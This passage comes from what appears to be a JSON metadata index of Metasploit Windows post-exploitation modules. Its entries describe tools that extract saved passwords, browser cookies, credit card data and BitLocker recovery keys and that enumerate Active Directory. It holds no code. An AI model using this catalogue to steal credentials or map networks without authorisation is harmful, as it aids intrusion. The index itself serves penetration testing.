- "notes": { - "AKA": [ - "HiveNightmare", - "SeriousSAM" - ], - "Reliability": [], - "SideEffects": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/windowslivemail": { - "name": "Windows Live Mail credential gatherer", - "fullname": "post/windows/gather/credentials/windowslivemail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Windows Live Mail credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/windowslivemail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/windowslivemail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/winscp": { - "name": "Windows Gather WinSCP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/winscp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts weakly encrypted saved passwords from\n WinSCP. It searches for saved sessions in the Windows Registry\n and the WinSCP.ini file. It cannot decrypt passwords if a master\n password is used.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/winscp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/winscp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/wsftp_client": { - "name": "Windows Gather WS_FTP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/wsftp_client", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts weakly encrypted saved FTP Passwords\n from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/wsftp_client.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/wsftp_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/xchat": { - "name": "XChat credential gatherer", - "fullname": "post/windows/gather/credentials/xchat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Xchat credentials on a Windows host. XChat is an IRC chat program for both Linux and Windows.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/xchat.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/xchat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/xshell_xftp_password": { - "name": "Windows Gather Xshell and Xftp Passwords", - "fullname": "post/windows/gather/credentials/xshell_xftp_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module can decrypt the password of xshell and xftp,\n if the user chooses to remember the password.", - "references": [ - "URL-https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/credentials/xshell_xftp_password.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/xshell_xftp_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/dnscache_dump": { - "name": "Windows Gather DNS Cache", - "fullname": "post/windows/gather/dnscache_dump", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module displays the records stored in the DNS cache.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/dnscache_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/dnscache_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/dumplinks": { - "name": "Windows Gather Dump Recent Files lnk Info", - "fullname": "post/windows/gather/dumplinks", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "davehull " - ], - "description": "The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script.\n This module will parse .lnk files from a user's Recent Documents folder\n and Microsoft Office's Recent Documents folder, if present.\n Windows creates these link files automatically for many common file types.\n The .lnk files contain time stamps, file locations, including share\n names, volume serial numbers, and more.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/dumplinks.rb", - "is_install_path": true, - "ref_name": "windows/gather/dumplinks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_bitlocker": { - "name": "Windows Gather Active Directory BitLocker Recovery", - "fullname": "post/windows/gather/enum_ad_bitlocker", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.", - "references": [ - "URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_bitlocker.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_bitlocker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_computers": { - "name": "Windows Gather Active Directory Computers", - "fullname": "post/windows/gather/enum_ad_computers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will enumerate computers in the default AD directory.\n\n Optional Attributes to use in ATTRIBS:\n objectClass, cn, description, distinguishedName, instanceType, whenCreated,\n whenChanged, uSNCreated, uSNChanged, name, objectGUID,\n userAccountControl, badPwdCount, codePage, countryCode,\n badPasswordTime, lastLogoff, lastLogon, localPolicyFlags,\n pwdLastSet, primaryGroupID, objectSid, accountExpires,\n logonCount, sAMAccountName, sAMAccountType, operatingSystem,\n operatingSystemVersion, operatingSystemServicePack, serverReferenceBL,\n dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory,\n netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL,\n lastLogonTimestamp, msDS-SupportedEncryptionTypes\n\n ActiveDirectory has a MAX_SEARCH limit of 1000 by default. Split search up\n if you hit that limit.\n\n Possible filters:\n (objectClass=computer) # All Computers\n (primaryGroupID=516) # All Domain Controllers\n (&(objectCategory=computer)(operatingSystem=*server*)) # All Servers", - "references": [ - "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_computers.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_computers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_groups": { - "name": "Windows Gather Active Directory Groups", - "fullname": "post/windows/gather/enum_ad_groups", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will enumerate AD groups on the specified domain.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_groups.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_groups", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_managedby_groups": { - "name": "Windows Gather Active Directory Managed Groups", - "fullname": "post/windows/gather/enum_ad_managedby_groups", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option\n option set; if so, it would allow that member to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_managedby_groups", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_service_principal_names": { - "name": "Windows Gather Active Directory Service Principal Names", - "fullname": "post/windows/gather/enum_ad_service_principal_names", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "Scott Sutherland" - ], - "description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins group.", - "references": [ - "URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_service_principal_names", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_to_wordlist": { - "name": "Windows Active Directory Wordlist Builder", - "fullname": "post/windows/gather/enum_ad_to_wordlist", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Thomas Ring" - ], - "description": "This module will gather information from the default Active Domain (AD) directory\n and use these words to seed a wordlist. By default it enumerates user accounts to\n build the wordlist.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_to_wordlist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_user_comments": { - "name": "Windows Gather Active Directory User Comments", - "fullname": "post/windows/gather/enum_ad_user_comments", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n such users have their passwords specified in these fields.", - "references": [ - "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_user_comments.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_user_comments", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_users": { - "name": "Windows Gather Active Directory Users", - "fullname": "post/windows/gather/enum_ad_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "Carlos Perez ", - "Stuart Morgan " - ], - "description": "This module will enumerate user accounts in the default Active Domain (AD) directory and stores\n them in the database. If GROUP_MEMBER is set to the DN of a group, this will list the members of\n that group by performing a recursive/nested search (i.e. it will list users who are members of\n groups that are members of groups that are members of groups (etc) which eventually include the\n target group DN.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_users", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_applications": { - "name": "Windows Gather Installed Application Enumeration", - "fullname": "post/windows/gather/enum_applications", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module will enumerate all installed applications on a Windows system", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_applications.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_applications", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_artifacts": { - "name": "Windows Gather File and Registry Artifacts Enumeration", - "fullname": "post/windows/gather/enum_artifacts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "averagesecurityguy " - ], - "description": "This module will check the file system and registry for particular artifacts.\n\n The list of artifacts is read in YAML format from data/post/enum_artifacts_list.txt\n or a user specified file. Any matches are written to the loot.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-07 16:01:45 +0000", - "path": "/modules/post/windows/gather/enum_artifacts.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_artifacts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "shell", - "powershell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_av": { - "name": "Windows Installed AntiVirus Enumeration", - "fullname": "post/windows/gather/enum_av", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "rageltman " - ], - "description": "This module will enumerate the AV products detected by WMIC", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-04-21 11:35:33 +0000", - "path": "/modules/post/windows/gather/enum_av.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_av", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_av_excluded": { - "name": "Windows Antivirus Exclusions Enumeration", - "fullname": "post/windows/gather/enum_av_excluded", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Andrew Smith", - "Jon Hart " - ], - "description": "This module will enumerate the file, directory, process and\n extension-based exclusions from supported AV products, which\n currently includes Microsoft Defender, Microsoft Security\n Essentials/Antimalware, and Symantec Endpoint Protection.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_av_excluded.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_av_excluded", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_browsers": { - "name": "Advanced Browser Data Extraction for Chromium and Gecko Browsers", - "fullname": "post/windows/gather/enum_browsers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alexander \"xaitax\" Hagenah" - ], - "description": "This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers\n on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI)\n and can extract additional data such as browsing history, keyword search history, download history, autofill data,\n credit card information, browser cache and installed extensions.", - "references": [], - "platform": "Windows", - "arch": "x64, x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-30 15:43:02 +0000", - "path": "/modules/post/windows/gather/enum_browsers.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_browsers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_chocolatey_applications": { - "name": "Windows Gather Installed Application Within Chocolatey Enumeration", - "fullname": "post/windows/gather/enum_chocolatey_applications", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nick Cottrell " - ], - "description": "This module will enumerate all installed applications on a Windows system with chocolatey installed", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-04-01 10:56:11 +0000", - "path": "/modules/post/windows/gather/enum_chocolatey_applications.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_chocolatey_applications", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_chrome": { - "name": "Windows Gather Google Chrome User Data Enumeration", - "fullname": "post/windows/gather/enum_chrome", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sven Taute", - "sinn3r ", - "Kx499", - "mubix " - ], - "description": "This module will collect user data from Google Chrome and attempt to decrypt\n sensitive information.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_chrome.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_chrome", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_computers": { - "name": "Windows Gather Enumerate Computers", - "fullname": "post/windows/gather/enum_computers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Abraham " - ], - "description": "This module will enumerate computers included in the primary Active Directory domain.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-10-12 10:59:29 +0000", - "path": "/modules/post/windows/gather/enum_computers.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_computers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "powershell", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_db": { - "name": "Windows Gather Database Instance Enumeration", - "fullname": "post/windows/gather/enum_db", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Barry Shteiman ", - "juan vazquez " - ], - "description": "This module will enumerate a Windows system for installed database instances.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_db.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_db", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_devices": { - "name": "Windows Gather Hardware Enumeration", - "fullname": "post/windows/gather/enum_devices", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon Perry " - ], - "description": "Enumerate PCI hardware information from the registry. Please note this script\n will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID',\n 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW',\n and 'USB'; it will take time to finish. It is recommended to run this module as a\n background job.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_devices.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_devices", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_dirperms": { - "name": "Windows Gather Directory Permissions Enumeration", - "fullname": "post/windows/gather/enum_dirperms", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kx499", - "Ben Campbell ", - "sinn3r " - ], - "description": "This module enumerates directories and lists the permissions set\n on found directories. Please note: if the PATH option isn't specified,\n then the module will start enumerate whatever is in the target machine's\n %PATH% variable.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_dirperms.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_dirperms", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domain": { - "name": "Windows Gather Enumerate Domain", - "fullname": "post/windows/gather/enum_domain", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joshua Abraham " - ], - "description": "This module identifies the primary Active Directory domain name\n and domain controller.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-08 13:35:22 +0000", - "path": "/modules/post/windows/gather/enum_domain.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domain_group_users": { - "name": "Windows Gather Enumerate Domain Group", - "fullname": "post/windows/gather/enum_domain_group_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "Stephen Haywood " - ], - "description": "This module extracts user accounts from the specified domain group\n and stores the results in the loot. It will also verify if session\n account is in the group. Data is stored in loot in a format that\n is compatible with the token_hunter plugin. This module must be\n run on a session running as a domain user.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-22 17:05:19 +0000", - "path": "/modules/post/windows/gather/enum_domain_group_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain_group_users", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domain_tokens": { - "name": "Windows Gather Enumerate Domain Tokens", - "fullname": "post/windows/gather/enum_domain_tokens", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "This module enumerates domain account tokens, processes running under\n domain accounts, and domain users in the local Administrators, Users\n and Backup Operator groups.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-10 13:54:39 +0000", - "path": "/modules/post/windows/gather/enum_domain_tokens.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain_tokens", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domain_users": { - "name": "Windows Gather Enumerate Active Domain Users", - "fullname": "post/windows/gather/enum_domain_users", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Etienne Stalmans ", - "Ben Campbell " - ], - "description": "This module will enumerate computers included in the primary Domain and attempt\n to list all locations the targeted user has sessions on. If the HOST option is specified\n the module will target only that host. If the HOST is specified and USER is set to nil, all users\n logged into that host will be returned.'", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_domain_users.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_domain_users", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_domains": { - "name": "Windows Gather Domain Enumeration", - "fullname": "post/windows/gather/enum_domains", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix " - ], - "description": "This module enumerates currently the domains a host can see and the domain\n controllers for each domain.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_domains.rb", - "is_install_path": 